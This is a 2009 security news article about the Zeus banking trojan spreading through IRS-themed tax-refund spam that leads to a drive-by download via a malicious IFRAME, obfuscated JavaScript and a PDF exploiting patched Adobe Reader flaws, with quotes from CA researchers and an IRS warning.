Incident Response, Malware, TDR

Zeus spreading through drive-by download

Updated Tuesday, Dec. 1, 2009 at 10:47 a.m. EST

The notorious information-stealing Zeus trojan is currently spreading via drive-by download, said security researchers at IT management software and solutions vendor CA.

Those behind Zeus, or Zbot, recently began circulating spam claiming to come from the Internal Revenue Service (IRS), requesting users submit a “tax refund request form” by clicking on a link that is provided. 

Clicking takes victims to a website that attempts to perform a drive-by download, meaning users do not need to take any further action to be infected, Don Debolt, director of threat research at CA, told SCMagazineUS.com on Monday.

If clicked, the link loads a browser window that looks blank but, in the background, is attempting to download malicious code and install a variant of Zeus, Mary Grace Gabriel, research engineer at CA's Internet Security Business Unit wrote in a recent blog post.

The malicious website contains an IFRAME that points to another website containing obfuscated JavaScript code that points to yet another page where a PDF file attempts to exploit known -- but patched -- vulnerabilities in Adobe Reader to download and execute a Zeus variant.

Previous spam campaigns used to spread Zeus have asked users to manually download and execute various reports, tools or statements seemingly coming from MySpace, Facebook, the IRS, Microsoft, the U.S. Social Security Administration and Verizon Wireless. This is the first IRS-themed drive-by campaign but it is not the first time Zeus authors have used the drive-by download technique, Debolt said.

“The people behind this threat are constantly refreshing their tactics,” he said.

The spam messages used in this latest campaign use subject lines related to IRS refunds. The body of the email reads: “After the last annual calculations of your fiscal activity we have determined that you are eligible to receive 760.22$ tax refund under section 501© (18) of the Internal Revenue Code.”

The IRS recently posted a notice, warning users about phony e-mail claiming to come from the agency.

“The IRS does not send unsolicited e-mails to taxpayers about their tax accounts,” the agency said. “Anyone who receives an unsolicited e-mail claiming to come from the IRS should avoid opening any attachments or clicking on any links.”

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.